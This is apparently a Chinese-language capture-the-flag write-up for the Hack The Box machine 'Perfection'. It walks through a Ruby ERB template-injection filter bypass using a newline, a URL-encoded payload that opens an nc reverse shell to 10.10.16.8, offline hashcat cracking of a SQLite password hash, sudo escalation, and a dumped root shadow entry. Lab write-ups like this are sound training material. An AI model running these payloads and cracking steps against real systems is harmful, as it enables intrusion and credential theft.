基本信息
- https://app.hackthebox.com/machines/Perfection
- 10.10.11.253
data:image/s3,"s3://crabby-images/5bbe5/5bbe545a0801615430502eff4fc02e719abac4c4" alt=""
端口扫描
22和80:
1 | nmap -sC -sV 10.10.11.253 |
80
在线加权成绩计算器:
data:image/s3,"s3://crabby-images/d4732/d4732fb5b1e26a3698b35116c53912b0e2c25573" alt=""
weighted-grade-calc
页面底部可以看到WEBrick 1.7.0,测试功能就是输入标签成绩百分比,计算加权成绩,给出的结果中包含我们输入的category:
data:image/s3,"s3://crabby-images/3baa4/3baa4b7fd8054e39384cb39994592328bdb7e7e5" alt=""
SSTI
根据前面看到的WEBrick知道是ruby,测试常规ssti发现存在过滤:
- SSTI (Server Side Template Injection) - HackTricks
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
data:image/s3,"s3://crabby-images/2d4f8/2d4f8c488638800011d0c183313af31563cc09ec" alt=""
crlf bypass
过滤一般是通过正则之类的,而ruby很常见的一个问题是正则只匹配单行,导致换行绕过:
- Ruby安全漫谈-安全客 - 安全资讯平台
https://www.anquanke.com/post/id/279113#h3-6 - CRLF (%0D%0A) Injection - HackTricks
https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a - SSTI Bypass Filter (/^[0–9a-z ]+$/i) - DevOps.dev
https://blog.devops.dev/ssti-bypass-filter-0-9a-z-i-08a5b3b98def
data:image/s3,"s3://crabby-images/4c131/4c131e10c45174f4b4617ff1de2324ea8ad888c1" alt=""
shell
payload url编码,打到susan用户
1 | <%= system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.8 4444 >/tmp/f') %> |
data:image/s3,"s3://crabby-images/b988d/b988dee0284e47c7c4e2deadc612a32aa21ea5ff" alt=""
user flag
susan用户目录,写公钥方便后续操作:
data:image/s3,"s3://crabby-images/5da2f/5da2f4dba8dc241d01d444928bed8f7b80b5404d" alt=""
提权信息
susan就在sudo组中,但需要密码,登录的时候提示有新邮件,查看邮件得到密码规则:
data:image/s3,"s3://crabby-images/8eb6b/8eb6b44c1f5c4847f3bf6c42cb982cd46fbf2748" alt=""
另外可以看到一个sqlite文件,其中可以得到susan的hash:
1 | 1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f |
data:image/s3,"s3://crabby-images/efa4a/efa4a0ede549b7dc06dea8d542d33466860551a8" alt=""
hash crack
现在密码规则和hash都有了,那就是离线破解密码:
- mask_attack [hashcat wiki]
https://hashcat.net/wiki/doku.php?id=mask_attack
1 | susan_nasus_1-1,000,000,000 |
提权 & root flag
破解出susan密码后就是直接sudo了:
data:image/s3,"s3://crabby-images/b5317/b5317375de9c39635d622844defee85d9eba5d20" alt=""
shadow
1 | root:$y$j9T$71hm.H7E.Jek01MNCWa.d0$FoTA1/EWWEDDDeMklpfTV9CmxBPoan8E0s3krRMPj2/:19490:0:99999:7::: |
参考资料
- SSTI (Server Side Template Injection) - HackTricks
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection - Ruby安全漫谈-安全客 - 安全资讯平台
https://www.anquanke.com/post/id/279113#h3-6 - CRLF (%0D%0A) Injection - HackTricks
https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a - SSTI Bypass Filter (/^[0–9a-z ]+$/i) - DevOps.dev
https://blog.devops.dev/ssti-bypass-filter-0-9a-z-i-08a5b3b98def - mask_attack [hashcat wiki]
https://hashcat.net/wiki/doku.php?id=mask_attack